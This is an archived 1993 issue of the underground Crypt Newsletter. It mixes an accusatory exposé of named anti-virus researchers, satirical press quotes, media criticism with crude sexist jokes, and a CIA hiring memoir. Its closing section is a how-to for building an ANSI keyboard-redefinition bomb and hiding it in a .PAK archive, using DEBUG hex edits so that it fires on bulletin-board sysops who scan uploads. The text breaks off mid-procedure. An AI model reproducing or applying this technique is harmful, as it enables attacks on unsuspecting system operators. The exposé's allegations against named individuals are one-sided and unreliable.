home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
HPAVC
/
HPAVC CD-ROM.iso
/
CRYPT17.ZIP
/
CRPTLT.R17
< prev
next >
Wrap
Text File
|
1993-08-14
|
57KB
|
1,243 lines
CRYPT NEWSLETTER 17
-=July-Aug 1993=-
Edited by Urnst Kouch
CRYPT INFOSYSTEMS BBS: 818-683-0854
INTERNET: ukouch@delphi.com, or
70743.1711@compuserve.com
------------------------------------
IN THIS ISSUE: MOLEHUNT - A wilderness of mirrors encountered
while probing the events behind AIS . . . QUOTABLE QUOTES: A
reporter's resource guide for hacker/computer virus news . . .
Raoul Badger reports from the our east coast bureau in Naples,
SC . . . Aristotle's Stupid ANSI-bomb Tricks . . . An interrupt
vector lister from KohnTarK . . . YB-X virus: twisting code
into a pretzel to foil heuristic analysis . . . much more.
MOLEHUNT: THE COLD, SECRET WAR OF VIRUS HUNTERS
[The following story continues with news surrounding the break-up
of hacker information files on the US Bureau of Public Debt's
Security Branch BBS. Because of the controversial nature of the
files - system hacking software, tutorials and virus source code -
The Bureau of Public Debt BBS became the target of a campaign
of anonymous protest aimed at closing the system. Because of the
controversy and whispering, mostly fueled by security worker
Paul Ferguson, administrators at Public Debt demanded the files
be removed from the system. Weeks later the events were
splashed hysterically onto the front pages of the national news
media which, unsurprisingly, got the story wrong. Spurred by
this imbalance, the Crypt Newsletter, Computer underground Digest
and others in the on-line community have slowly brought out
the complexities of the issues, personalities and secret dealings
behind the official news. This segment exposes some of the
unethical behavior practiced by the Computer Antivirus Research
Organization (CARO), a publicly sanctimonious self-selected
group of professionals and pan-professionals with the purported
aim of keeping the world safe from computer virus infection.]
As the smoke clears from the ruins of the Bureau of Public
Debt's Security Branch bulletin board system, the only
thing to be seen is that, given their druthers, many
anti-virus software developers and security experts are little
different than caricatures of the venal computer thugs
they'd like to persecute.
Consider: according to sources at The Bureau of Public Debt,
months prior to the campaign against the Public Debt
system, Computer Antivirus Research Organization (CARO) member
Joe Wells had attempted to enlist the aid of department
security workers in targetting and harassing, with the final aim
of shutting down - by whatever means necessary - a list of
bulletin board systems suspected of storing computer viruses.
The list, compiled by CARO, appeared, according to Public Debt
sources, to name some organizations and systems with
no connection to the computer underground or BBS's which
trade in computer viruses. Security branch workers rebuffed
Wells proposal as stupid and liable to result in
legal retaliation.
About the same time, CARO member Klaus Brunnstein
of The University of Hamburg's (Germany) Virus Research
Center threatened Public Debt's Security Branch with a
press campaign if virus source code and hacker tools were
not removed from its BBS.
This nettled Security Branch workers, who knew that other
CARO associates were helping themselves to the files in
contention.
What emerged was nothing less than a picture of CARO
anti-virus software developers slithering out of some damp
underground cave, wending their way between stalagmites like
sightless, poison-skinned amphibians bent on petty schemes
of overthrow aimed at rivals and selected, real or imagined,
virus programming public enemies.
In March, right on schedule, CARO member Alan Solomon lobbied
publicly against the Public Debt BBS at an IEEE Computer
Security conference in NYC. But in a grand stroke of
cosmic irony, a member of the hacker/virus-programming
group Phalcon/SKISM known as Timelord "trashed" an
embarrassing CARO order-of-business memo written during an
informal meeting at the same conference. Subsequently, the
CARO memo was passed on to Black Axis virus exchange sysop John
Buchanan who eventually sent it around the globe on
the NUKE_THEWORLD FIDONet echo in July.
The memo is unique in that it provides an inside look at the
schizophrenic nature of CARO. Up for CARO membership,
it reads, is virus exchange sysop John Buchanan. (He
was later turned down.) It also admits a "leak"
in the CARO virus collection (onto virus exchange bulletin
board systems) necessitating some form of "tagging" of
files so that sources can be traced. The memo also requests
members to PUBLICLY disavow the existence of any such
CARO virus collection.
Most interesting is the recirculation of Joe Wells' "virus
exchange" hit list idea. According to CARO, "it's mostly a US
problem" which is to be addressed by setting up a "Murky Database"
of virus exchange systems and their operators with the
aim of galvanizing a police prosecution against those found criminal,
but not against those innocent.
It is worth noting that CARO, a self-selected professional/pan-
professional organization with primarily FOREIGN leadership, isn't
above trying to instigate police investigations against US
citizens.
This kind of secret campaigning by CARO-members travels from
west to east, too. Recently, CARO member Glenn Jordan
solicited the aid of virus exchange sysop John Buchanan in
an attempt to discredit a European researcher applying for
membership in CARO. Jordan wanted Buchanan, who has by turn
been nominated for membership in CARO, turned down, and targeted
for harassment by the organization for running a system which
sells and trades viruses, to supply CARO with evidence that the
researcher in question had purchased viruses from his bulletin
board system. Buchanan, also known as Aristotle, refused to
cooperate, showing more integrity than any of the mentioned
CARO members.
In retrospect, it becomes far less surprising that the Bureau
of Public Debt's BBS manager, Kim Clancy, would wish to have as
little to do as possible with any of a group of embarrasingly
smelly fish.
The remainder of the story has been extensively covered in
Computer underground Digest and previous issues of The
Crypt Newsletter. Acting under the encouragement of CARO-
member Alan Solomon, security worker Paul Ferguson planted an
anonymous letter of complaint in RISKS Digest 14.58 and later
supported it with a piece under his own name. Bureaucrats at The
Bureau of Public Debt, spooked by Ferguson's "anonymous"
letter and the possibility of congressional inquiry, removed
hacker tools and virus code from the system.
Weeks later, the story broke in one-sided fashion at The Washington
Post, with Paul Ferguson again able to carry himself off as
a "whistle-blower" and independent, but concerned "expert."
The official reality created was one of Kim Clancy and The
Bureau of Public Debt smeared as "morally bankrupt," according
to one spin-off news piece by columnist Wayne Rash in
the specialty tabloid, Communications Week.
This world of suspicion, charge and countercharge has been
nothing if not a wilderness of mirrors, blinding and stupefying
to those looking in from the cold, but clearly revealing the
underhanded, sub rosa tactics of many anti-virus researchers to
those with the patience to look deep into its reflecting surface.
[Because of the sheer size of letters and related debate on
this issue received by The Crypt Newsletter, we could not publish
everything we might have liked. For further material,
we point to recent issues of Computer underground Digest,
or the archives at Crypt InfoSystems BBS (818-683-0854)
which contain extensive collections of network electronic
mail dealing with the Public Debt BBS news story.]
QUOTABLE QUOTES: A JOURNALIST'S RESOURCE SHEET USEFUL IN
ADDING PUNCH TO ANY STORY ON COMPUTER VIRUSES OR
HACKERS.
"The sleep of reason brings forth monsters." --Goya
While researching topics of concern to anti-virus software
industry workers and computer virus programmers, The Crypt
Newsletter has managed to collect a great amount of potentially
confusing text, a literary land-mine so to speak, just
waiting to blow the foot off anyone blundering around
unescorted in the field. As a public service, I've put together
this list of "quotable quotes" and how and when to deploy
them in stories on computer viruses and hackers. If you're
a journalist or just some yahoo who needs to punch up a
rant with superficially convincing expert testimony,
feel free to use them, properly credited, of course.
For the time when you need a good definition of the
term "hacker":
"Hackers are people analogous to drug addicts. They need
their fix and cannot leave the machine alone. Like addicts
they seek novelty and new experiences. Writing a virus
gives them this, but unlike addicts who get immediate relief
after a fix, they are not usually present when the virus
triggers and releases its payload."
--Jan Hruska, anti-virus software developer, in
"Reefer Madness", oops - I mean,
"Computer Viruses and Anti-Virus Warfare"
For the time when you need a good definition of the term
"freak" [sic]:
"[Freaks are] an irresponsible subgroup of hackers, in the
same way some drug addicts remain reasonably responsible
(and use sterile needles), others (psychopaths) become
irresponsible (and share needles). Freaks have serious
social adjustment problems . . . unspecified grudges against
society. They have no sense of responsibility or remorse
about what they do . . . The mentality of the freak virus
writer is not unlike that of a person who leaves a poisoned
jar of baby food on a supermarket shelf. He delivers his
poison, leaves and is untraced, and in his absence the
victim falls."
--Jan Hruska, same as above
For when you need just the right touch of righteously
indignant flatulence:
" . . . it's been a while since the Treasury has openly
helped lawbreakers ply their illicit trade."
--columnist Wayne Rash, on the US Public Debt
BBS, in - and I am not making this up - "Rash's
Judgment", Communications Week, June 28, 1993
And, equally good:
"The fact that the Treasury Department clearly has
demonstrated the depths of its moral bankruptcy may
not surprise those of us in [fill in your locale here],
but it should cause concern in the country in general."
--columnist Wayne Rash
This next one is for when you want to scare someone
with the evil genius of virus authors.
"One such virus-mutation engine, called Dark Avenger
[sic], and available in the darker corners of the
electronic bulletin board universe, lets expert programmers
create polymorphic viruses.
--Peter Lewis, in his "Executive Computer"
column in The NY Times, July 5, 1993
And this is for when you want to convince someone that
it doesn't take an evil genius to make viruses. [Hint:
Don't use it in the same story as the above, it will just
confuse readers.]
" . . . with this [virus code], relative amateurs could create
new viruses, according to software writers."
--reporter Joel Garreau in The Washington Post,
June 20, 1993
This one is good for that human element "features section"
writers are fond of. It has one anti-virus software developer
taking a publicity op to blind-side a more successful
competitor.
"Just a couple of years ago, one anti-virus product
developer created [demand for his product] at will with
trumped-up and wildly exaggerated prognostications about
what a new virus was going to do and when it was going to do it.
Remember Michelangelo?"
--Pam Kane, president of Panda Systems, quoted
by Peter Lewis in his "Executive Computer"
NY TIMES column [see above]
And here's one by a guy totally unconnected to virus/anti-virus
commercial interests, a truly "independent" expert, a writer
of fiction.
"There are all sorts of expensive programs nowadays for
detecting and neutralizing viruses. And a whole lot of
people thinking up ways to invent viruses that can't be
got rid of. It's a whole industry. Lovely. I mean
_rotten_."
--Dick Francis, former jockey and wildly
successful mystery novel author, in
his recent work, "Driving Force" (Putnam).
The last quote I leave you with is a real crusher.
Including it as a snappy editorial capper will crown you
king or result in vilification beyond belief, depending
on the political slant of your peer group.
"And if [bringing back moral and ethical backbone] fails,
we can always re sort to our barbaric past -- 'If a child
shows himself incorrigible, he should be decently and
quietly beheaded at the age of twelve.' (Don
Marquis, American journalist)"
--National Computer Security Association News
editorial, May/June 1993
RAOUL BADGER, MEDIA CRITIC, REPORTS FROM THE CRYPT NEWSLETTER'S
EAST COAST BUREAU IN NAPLES, SC:
So you've read Badger's reviews and come to the conclusion
that he is a lonely, bitter misanthrope without prospects
for a meaningful career or a decent Friday night date.
Well, no comment.
But in an effort to show that literacy in America is not a
total waste, I'm compelled to examine an article by Scott
Shepard, written for the Cox News Service.
Mr. Shepard's article appeared in The State Newspaper
(of Columbia, SC) under the title:
"ROAD WITHOUT SIGNS:
"Vision of information highway lacks design, rules for drivers"
Mr. Shepard has done his research being less than
impressed with the "Information Highway"!
The best line in the piece is repeated five times:
"12:00" "12:00" "12:00",
a not-so-subtle way of reminding the reader of the millions of
Americans who lack the know-how or will to master the skill
of setting the time on their VCR. [Crypt Newsletter techno-hint:
Place a rectangle of black electrical tape over the digits. That
will fix it nicely.]
Other highlights of this little gem:
"The VCR jokes told by the experts and policy-makers reflect
their unease about their 'Field of Dreams' gamble that, if
you build it, users will come.
"The good news is everyone in Congress supports the information
superhighway . . . [t]he bad news is nobody in Congress
understands what the information superhighway is."
-the above is a quote from Rep. Ed Markey,
chairman of the House Subcommittee on
Telecommunications and Finance. And before
you run off looking to shake his hand
consider detractors rate Markey little
more than a press hound, equally lacking
of techno-savvy as his Congressional
brethren.
And, here's another:
"... superlatives spawn skepticism, however, especially since
neither the design of the information superhighway nor the rules
of the road governing such basics as access, privacy and
copyrights have been advanced.
"Another basic issue -- who will pay for it -- hasn't been
emphasized in the public debate.
"....T.J. Rodgers, president of Cypress Semiconductor Corp.,
called the administration's proposal a handout and labeled
the information superhighway 'the most recent example of
industries lining up to feed at the public trough.'"
"The potential for amazing advances in individual thought and
creativity is very real, but so is the potential for oppression
and mistrust, the likes of which we have never seen before..."
-Emmanuel Goldstein, publisher of 2600
Magazine
Simply amazing! A balanced, well researched article on the
information highway that doesn't regurgitate Mitch Kapor's
pablum.
Maybe there is hope for journalism in America, after all!
Ah, but the cynic thinks, maybe not. The July 19, 1993 issue
of TIME has a full page story on "Heartbreak in Cyberspace."
My, my, my. Seems that some Lothario used the WELL [the Whole
Earth 'Lectronic Link] to develop ongoing relationships with
a number of "babes" [sounds of local P.C. Bund members knocking
on my door], oops, sorry, make that "women."
Oh yes, Don Pardo-Lothario had one exchanging passionate phone
sex for hours on end. He won another's complete trust. A third
split the cost of an airline ticket so they could share a hot
and steamy weekend.
The rest of the story is stupidly obvious. Casanova-Don
Pardo-Lothario dumps the cow after getting cream [sound of local
P.C. Bund members breaking down my door], agghhh, make that
"shows himself for the low-life scum he really is." Heartbroken
b---, uh, woman commiserates with girlfriends and finds out she
ain't the first. Women band together to spread the word on the
fiend.
This sparks "a network-wide debate on the spoken and unspoken rules
of electronic etiquette," with all the standard recriminations and
rationalizations.
I can understand that TIME had space to burn, but don't the
people on the WELL have anything better to do? Jeez, I can hear
this kind of crap at any Xerox machine in any fair sized office in
the country. Are there really people willing to spend two bucks
an hour to hear it again? [Don't answer that. It's rhetorical.]
And what about this stunning conclusion?
"'I feel like an absolute fool,' says Lisa. 'People
look at a computer and fail to realize that behind those
words is a real person with feelings.' Welcome back to
the real world."
This is news? If Paul Fussel read it, he'd be rolling in
a pool of his own sick. As long as there have been primates
with swinging dic-- . . .[sounds of local P.C. Bund members
strapping me into an electric chair] uh, there have been lying,
cheating bastards willing to use any means necessary to achieve
gratification. If you're a woman and don't know this, collar
any guy and he'll admit it. Hell, we're even proud of it. If no
men are handy, ask any woman. Most will agree.
Since using a keyboard has not been shown to dramatically
lower testosterone levels, why is any of this surprising?
Oh well, Mr. Badger is signing off. There's 'babes' [sounds of
local P.C. Bund members trying to execute me] at The WELL who
need, heh-heh, "consolation and sympathy."
IN RELATED NEWS: A THUMBNAIL SKETCH OF CONGRESSMAN ED MARKEY,
U.S. POLICYMAKER FOR COMPUTERS AND TECHNOLOGY ISSUES
In an August 1 news piece, The L.A. Times proclaimed Democrat
Rep. Ed Markey, "The Man Who Is 'Plugged in' to How the Nation
Communicates." Citizen Markey is of interest to newsletter readers
because he sits in charge of the House Telecommunications and
Finance subcommittee and has recently imposed himself on the
issues of privacy and encryption, the 'information superhighway'
and the public availability of virus source code and hacker tools
on the US Bureau of Public Debt's Security Branch bulletin board
system.
The 47-year old, Massachusetts Congressman became a player
in the Public Debt controversy only after reading about it
in The Washington Post. He subsequently sent a letter of
protest to Secretary of The Treasury Lloyd Bentsen (Public
Debt is subsidiary to the Dept. of Treasury) which was republished
in Computer underground Digest 5.57. In addition, Markey
collaborated with the National Computer Security Association's
recent Computer Virus Awareness Day confab in the nation's
capitol and it seems certain he will be involved in a drive
for new legislation against computer viruses and their trade which
is expected to crest in the winter months of this year.
However, according to The L.A. Times, the politician who would
contribute to future policy on telecommunications, computer viruses
and the "information superhighway" has an office with only a
minimal set of the "high tech" tools he claims are part of the
nation's future: a telephone, TV, videocassette
player and fax machine. Hmmmm, no personal computer?
In addition, in July 1988 Washingtonian magazine published a poll
dubbing Markey the "No. 1 'Camera Hog' in Congress."
Markey also acknowledged to The L.A. Times that he accepts
contributions from leaders in the industry he's in charge of
regulating. Political rivals call this improper and in 1990,
consumer activist Ralph Nader went on record in The Boston Globe
claiming, "[Markey is] getting on a first name basis with too many
people in the industries he oversees, having too many dinners
with them."
Although lauded by Telecommunications and Finance subcommittee
underling Rep. (Dem.) W. J. Tauzin of Louisiana who stated for
The L.A. Times that, "Ed Markey has arrived" and courtier for
the entertainment industry, Motion Picture Association of America
president Jack Valenti, who said "[Markey is presiding] over a sea
change in the way we communicate," Times business reporter
Jube Shiver, Jr., did not document any Markey-inspired technology
legislation which has been of benefit, directly or indirectly, to
the average American.
DELL COMPUTER SURVEY SHOWS AMERICANS PHOBIC AND BAFFLED BY
DIGITAL ALARM CLOCKS, UNREADY TO DRIVE ON 'INFORMATION
SUPERHIGHWAY'
A Dell Computer survey of 1,000 adults and 500 teens across
the country found a sizeable percentage mentally ill-prepared
to assault the coming 'information superhighway.'
Twenty-five percent of those surveyed said they would not
use a computer unless it meant their job. Another quarter had
never used a computer or even recorded a favorite TV show on
a VCR.
More results from the Dell poll:
--Thirty-two percent of all adults were so cowed by
computers they feared breaking the machines if allowed
to use them unguided. Of these, 22 percent admitted fear
at the prospect of setting digital alarm clocks.
--Fifty-one percent of the adults also found computers
and related technology baffling; 58 percent found the
pace of technological advance confusing.
Shhhhh. Loose lips sink ships! The Crypt Newsletter advises
not sharing this data with any mainstream business and technology
writers. They could become morose - perhaps even suicidal - at
the mere thought of having to 'eighty-six' 50 percent of all new
story ideas for the remainder of 1993.
CRYPT NEWSLETTER FEATURE: HIRING PRACTICES AT THE CIA - NO
BEDWETTERS ALLOWED
[This story was originally published by Times-Mirror, Inc.
in 1992, but we felt it's just the kind of thing newsletter
readers would find fascinating. Republished with
permission.]
So you want to be a spy? And you're sure the place to go
is the CIA!
The CIA _is_ interested in hearing from you. It interviews
thousands of Americans for jobs as spies, intelligence
analysts and technical specialists every year. But because
of its classified mission, hiring methods are unusual and
Kafka-esque, taking at least a year to complete and bound in
smothering bureacratic process, comic ineptitude and secrecy.
Although the number of people employed by the CIA is classified,
it regularly recruits on college campuses and through the
job listings in major metropolitan newspapers. A recent
series of advertisements aimed at minorities in magazines
like Ebony drew spectacular media attention, but the typical
CIA ad is bland and unassuming, easily blending in with
countless other corporate calls for highly-trained, college-
educated Americans.
A year ago, one such ad ran in The Philadelphia Inquirer.
Candidates were encouraged to resumes for consideration
to a post office box drop in Pittsburgh, one of the agency's
regional personnel clearinghouses. Candidates would be
required to undergo a rigorous physical examination and
polygraph test, the ad warned ominously.
I forwarded my resume to the CIA mail drop, listing my
qualifications as a scientist and journalist with the
reasoning that these talents would be useful in analysis.
Apparently, the CIA's personnel staff agreed. They got
back to me in about a month and in so doing, begin a
unique series of communications.
Candidates, you see, are not contacted directly by the
CIA. Instead they are delivered mail that requests them
to contact an agency worker by telephone within a certain
time frame. The contacts are often anonymous. For example,
prospects whose last names began with "S" were asked to
phone "Bobbi - Program Officer" at the CIA's Stafford
Building in Tyson's Corner Center, VA.
The initial interview with the CIA usually involves a type
of cattle call. About a year ago, 30 of us met in a room
at The Valley Forge Convention Center. There we underwent
preliminary screening from a CIA team led by Pittsburgh-based
representative Virginia Kraus. The team included workers
from the agency's directorates of intelligence, operations
and science and technology, including one agency employee
who looked over my resume, saw that I worked at a newspaper
and added that he had come to the agency as a newsman, too.
It was the job of this spy and his colleagues to weed out
potential crazies and issue to the remainder the agency's
personnel Holy Grail, the 30-page Personal History
Statement (PHS).
The PHS is an inventory that scrutinizes all aspects of the
job candidate's professional and private life. It becomes
the basic curiculum vitae used during hiring and the template
for the CIA's security team during its investigation of
potential agents.
"Don't leave anything blank," warned one of the spies balefully
at the convention center. "I didn't think anyone would really
sit down and go over the whole thing when I started, but
believe me, they do."
The PHS requires the spy-in-waiting to designate references
in a number of categories, including family members, professional
acquaintances and personal (not family) acquaintances who have
lived in close proximity to the candidate for a year or two.
"This is so the agency can call up your neighbors and ask them
if there's loud music and blue smoke coming out of your front
door on the weekends," Kraus cracked.
The candidate is asked to document any record of criminal
activity including theft, traffic violations, sexual deviance
and perversion, unlawful drug use or undue publicity surrounding
a divorce or civil suit. There is a battery of medical inquiries
probing the candidate's injuries and hospital visits, mental
stability, prescription and non-prescription drug use, gastro-
intestinal health and nocturnal micturition frequency.
The candidate is warned that the veracity of his statement
is liable to be tested by polygraph. Accompanying submission
of this dossier to the CIA are any collegiate transcripts
and a long writing sample dealing with any topic of interest
to intelligence workers. For example, writing about home
grown pilot plants designed for the production of biological
warfare agents in Third World countries is appropriate if
you're applying for a job as an analyst.
All candidates were warned not to inform anyone except close
family members of their CIA screening. Kraus encouraged the
use of a cover like "the government" or "Department of
Defense" when notifying those who needed to be designated as
references.
A few months after submission of the personal statement and
transcripts, the candidate is likely to get a phone call
from CIA security who identifies himself only as a member
of "the Agency."
His job is to verify and embellish some of the information
included in the PHS, specifically those sections dealing with
criminal activity and homosexuality.
In my case, the agent was particularly interested in a reference
to recreational marijuana use in college.
"How many cigarettes would you say you smoked?" he asked.
Satisfied with the answer, the agent continued by inquiring
about drinking.
"The Agency's position in these matters is one of abstention
enforced by testing," he said. That concluded the interrogation.
"You have a nice day," said the spy before hanging up.
Most of this preliminary screening is in response to much
publicized problems the CIA has had in the past with the
penetration by the criminal or mentally ill. James Jesus
Angleton, the feared head of the CIA's counterintelligence
wing and one of the most powerful men in the agency during
the height of The Cold War, left his office in disgrace,
having acquired a reputation, documented by journalists
Thomas Mangold and Seymour Hersh, as a paranoid alcoholic
and pathological liar.
If the prospective employee's personal statement and transcripts
survive the initial evaluation, he or she is given a series
of aptitude and psychological tests.
Those in eastern Pennsylvania were again contacted and issued
a ticket/summons for the tests, which were administered one
summer Saturday morning in the physics building at the University
of Pennsylvania in Philadelphia.
The testing at Penn, an all-day affair, included a series of
vocabulary, simple math, reading comprehension and abstract
thought multiple-choice quizzes, similar to a college aptitude
test.
Also included was the California Psychological Inventory,
devised by Dr. Harrison Gough, psychologist. Our copy,
which had a copyright date of 1956, asked for true/false
responses to a number of statements, including:
1) I have gotten myself into trouble because of my involvement
in unseemly sexual activities.
2) In high school I was often sent to the principal's office
for "cutting up."
3) I sweat in even the coolest weather.
4) I believe it is every citizen's duty, as part of the community,
to keep his sidewalk and lawn neat and clean.
5) I must admit, I think people are fools who don't think the
American way is the best there is.
6) I often think people are watching me.
7) I like tall women.
8) I must admit, I don't mind being the "cut-up" at the office
party.
One can only wonder what the two women who took the psychological
inventory that Saturday answered to question No. 7.
It seemed curious that the agency was using a test from 1956 --
when presumably very few women applied for jobs in intelligence
and when being a "cut-up" in high school was one of the worst
things you could be accused of - to screen young professionals
in 1991.
Two other tests included a work environment survey and a current
world events test, both tailored for the CIA.
For example, the work environment survey asked whether the
candidates would accept a job in a foreign culture or where
conditions of extreme physical hazard (presumably a war zone),
unpalatable food, no sanitation or debilitating disease
prevail. It also focused on whether candidates would be
willing to work anonymously and without recognition for
long periods of time for people they find personally
repugnant.
The hardest test was the current world events quiz. It presumed
a comprehensive knowledge of world politics and personalities
that might only be gained from religious study of The Washington
Post or a background in international relations.
After the testing, a couple more months passed.
Candidates were then informed by mail whether they had been bound
over for interview at CIA headquarters in McLean, VA.
During this 9-month long period, no one from the agency had
spoken to me for more than five minutes.
Finally, another letter arrived. It included an appointment
date with "Agency Officials" interested in discussing
possible employment.
The interview was set for the week after Thanksgiving in the
Directorate of Intelligence's Office of East Asian Analysis.
"Ellie" was my contact. A room was reserved for the night
before at The Days Inn in Vienna, VA.
It was a 15-minute drive to the CIA the next morning. The
unmarked compound is not far from Langley High School.
You can tell you are there by the barricades of concrete and
obstacle-wire surround the wooded campus.
The entrance block-house guard was supposed to check my
photo driver's license, but he handed it back and waved
me through without taking a look.
The Directorate of Intelligence is a moden looking edifice
of cement and green glass. At the entrance were a score of
smokers bearing the same furtive, hounded look seen at
other corporations where smoking within the building has been
banned.
Just inside was a marble hallway containing a likeness of
William Casey.
Getting to the Office of East Asian Analysis entails a check-in
at reception, where I presented my papers. After a few minutes,
"Ellie," a middle-aged woman showed up to escort me.
I was issued a green piece of paper and a pass card used to get
through an electronic Pinkerton security turnstile. A security
man gave my briefcase the once-over. Overhead was a sign
stating that passage beyone the portal conferred agreement
to a search of your person, your belongings and your car at
any time.
The agency has been sensitive to accusations that it's possible
to walk out of the building with highly classified materials
ever since 1978, when William Kampiles walked off CIA grounds
with technical manuals for the super-secret National Reconnaissance
Office's KH-11 spy satellite. Kampiles, a junior clerk, was
sentenced to 40 years in jail for selling the manual to the
Soviets. During the same period, 16 other KH-11 manuals
disappeared and were never traced.
While I was coming in, many were coming out. No bags were
checked. Later, when I left, no one asked about my
briefcase.
Upstairs in the Office of East Asian Analysis, National
Geographic-like photos of China adorned the walls.
Documents marked "SECRET" littered the desks.
Sadie Brown-Fields, a personnel administrator for the office
was holding court.
In her office, I asked her if the recession had affected
hiring. It had, she said. "I don't like the word
'down-sizing'," she said with a glassy smile. "We
call it 'right-sizing.'"
Fields said she couldn't say whether the agency's "right-
sizing" involves cuts in 60 percent of prospective
hires, as had been recently reported in national newspapers.
But then she changed her mind and commented, "That's a little
high."
This has created problems for the agency, she said. Since
attrition isn't removing veterans at the expected rate,
it's been difficult to bring in new people she added.
Complicating matters is the polygraph and security check.
"Eighty to 90 percent of the people to which the agency
makes an offer fail it."
As for where I fit into things, interest was from the
China Division: Industry & Technology branch of the
office.
"The section head's not here today," said Fields. "But
Ken Sawka will speak with you."
Ken Sawka turned out to be an airy, blond-haired analyst
with a master's degree in international relations from
American University. I thought Ken had what is known as
a paper rectum, a demeaning but accurate descriptive which
used to be in fashion.
"What did you say your name was?" he asked as we walked
down the hall to his boss's empty office.
Sawka didn't have my resume, my PHS or any information on
my scientific background, the reason I was being interviewed,
so he didn't ask any questions, preferring instead to
talk about himself.
How many scientists are currently working in the office,
I finally asked.
"None," Sawka said. "That's why we're trying to look at
some."
The agency, Sawka said, made up for this lack by sending
analysts to seminars on topics the various departments
may have to deal with, such as ballistic missile technology.
Sawka added he was glad he had finally learned what an
accelerometer was and how integral design is to ballistic
missile development.
I asked Sawka about the polygraph screening and nature of
the psychological testing.
He laughed nervously but said, "Everybody has to go through
it and it's not any fun. But security believes very
strongly in it and the agency works hard to get candidates
through the lie-detector. We allow them to take it three
times."
At the end of the interview, Fields asked me to take some
"stuff" over the Stafford Building for her when I went there
to collect travel expenses. A moment later she thought better
of it, but supplied me with directions anyway.
Outside the Stafford Building later in the day were more harried
smokers. Inside I asked for gas money ($20) and mileage.
A CIA worker insisted that this be compared against the price
of the lowest airline ticket from Philadelphia. I argued
that this was ridiculous, to no avail.
As predicted, a telephone call to a CIA airline-ticket specialist
came up with a figure far in excess of the gas money. The
agent then gave me a little more than $200 of the taxpayer's
money, a generous per diem, and mileage allowance.
The hotel room had been paid in advance.
A call to Field's office a few days later elicited the
information that in East Asian Analysis, there were no
job openings and no hiring plans.
When I asked why, in that case, the testing and interviewing,
no one had an answer except to say "the agency has to plan
for every contingency."
ARISTOTLE'S STUPID ANSI BOMB TRICKS or DON'T UNPAK THAT PAK!!!
The latest craze to hit the virus scene is the use of the old
ANSI bomb in PAKed CON file. Perfected in the Ukraine by an
ancient soothe sayer of soothe that needeth saying, this tiny
non-conformity packs a whallop! Just ask the folks at McAfee's
who alledgedly took a nukeage from one. Why all the hub-bub
about them? Well, I'll tell ya! It seems that the redirected
keyboard trick still works when deployed from the CON device into
a target rich environment. Unwary sysops who utilize the new
comforts of auto-scanning their uploads are learning that the
risk of a serious nukeage still exists. So that you may better
understand how this function works, I have laid out a little
example;
Make and ANSI bomb with the TJA-ANSI bomb creator from RABiD.
(Hopefully, Dr. Kouch included it in this issue of the CRyPT
NEWLETTER... If not, BITCH!) I have included the displays so
you will be able to have a full explanation of what is going
on. (Trust me! If you can't follow this program *WITHOUT* the
following eaxmples, you don't need to be using a computer in
the first place.
────────────────────────────────────────────────────────────
════════════════════════════════════════════════════════════
THE ANSI BOMB GENERATOR 1.03ß (C)1990 by The Jolly Anarchist
════════════════════════════════════════════════════════════
MAIN MENU
═════════
[A] Create An Ansi Bomb
[B] Add A Bomb To A File
[C] Information/Help
[D] Exit to DOS
Your Choice?
────────────────────────────────────────────────────────────
Obviously, you want to create the thing at this point :)
So choose "A"
Simply pressin the <Space Bar> will insert the desired key that
you wish to redefine...
────────────────────────────────────────────────────────────
Enter Key to Re-Define : 32
Please Re-Enter the Key : 32
Continue?
────────────────────────────────────────────────────────────
Once you've chosen your key, the next thing you will need to do
is name the program you want executed when the bomb goes off.
────────────────────────────────────────────────────────────
Enter Your Sequence Below. You may not backspace, so GET IT RIGHT!
Type: '/S' to save, '/A' to abort, '/R' to Restart, '?' for help
═══════════════════════════════════════════════════════════════════
DIR
Save Sequence?
────────────────────────────────────────────────────────────
Of course you save the silly thing! Follow the remaining prompts
and use that growth on your shoulders to answer the prompts.
────────────────────────────────────────────────────────────
{--------}
Enter a Name for this Bomb: TEST
{--------------------------------}
Enter a Description for this bomb: EXAMPLE FOR CRyPT
────────────────────────────────────────────────────────────
Aside from the free plug for the CRyPT Newsletter, the only
remaining thing to do in this program is to add the bomb to
an ANSI file, or simply leave it as it is and let the program
create one for you.
────────────────────────────────────────────────────────────
File to Add Bomb to: LOGO.ANS
Bombs Available :
TEST
{--------}
Bomb to add: TEST
────────────────────────────────────────────────────────────
Next you'll see...
────────────────────────────────────────────────────────────
Add Bomb to then [B]eginning or the [E]nd of the file?
────────────────────────────────────────────────────────────
I have found that if you add this little critter to the end of
the file, the entire ANSI will display whereas at the beginning
of the file, the ANSI may never appear. Anyhow, you now have a
file named TEST or LOGO.ANS that contains the strings for an
ANSI bomb that look something like this;
68;73;82;13p
The way it reads is, SPACEBAR is redefined to 13p <RETURN>
So, what it will do is type ;68="D", ;73="I", ;82="R". (That's
DIR, for the mentally impaired) It can be anything, but for
this example and to be non-destructive, we'll use DIR. When
the unsuspecting SySop opens the file and the contents of the
CON file inside the .PAK file are expanded, the trigger is set.
A simple touch to the spacebar will yield nasty results. Here
though, you'll only see your smutty .GIF collection jump up at
you.
Questions that will arise...
Er, uh! Gee, Mr. ARiSToTLE, How do I get the ANSI bomb inside
the .PAK file???
Well, I'll tell ya!
Take your little creation and rename it to "YON" with no
extension. At the command line, create a .PAK file by typing
PAK A TEST YON
You will immediately see Mr. PAK sucking up the file...
Once it is all sucked up inside, this is where it gets fun!
Again, at the command line, type;
DEBUG TEST.PAK
You will see a single "-" waiting for some input. Type;
D 0100
This will list the first chunk of code in TEST.PAK and depending
on the version you have, you should see something like this;
-
2EC7:0100 1A 02 59 4F 4E 00 46 72-11 00 00 00 14 15 13 11 ..YON.Fr........
2EC7:0110 00 00 00 EE 1A 59 7C 39-22 11 00 00 00 1B 5B 33 .....Y|9".....[3
2EC7:0120 32 3B 36 38 3B 37 33 3B-38 32 3B 31 33 70 1A 00 2;68;73;82;13p..
2EC7:0130 FE 02 01 00 00 00 00 00-FE 00 1E B8 B9 1E 50 FF ..............P.
2EC7:0140 36 98 1C E8 DD BC E8 8E-BD 98 89 C6 E8 AF FC 85 6...............
2EC7:0150 F6 74 0A C6 06 D9 22 01-B8 01 00 EB 02 31 C0 5E .t...."......1.^
2EC7:0160 C3 31 C0 50 31 C0 50 31-C0 50 E8 3A BE 3C 00 74 .1.P1.P1.P.:.<.t
2EC7:0170 AD E8 82 BB EB A3 56 A1-CE 1C 3B 06 98 1C 7E 04 ......V...;...~.
-
In the first line, you see where it says YON.Fr? I sure hope so
or I'm spinning my wheels here... Now you will type;
E 0102 'C'
W
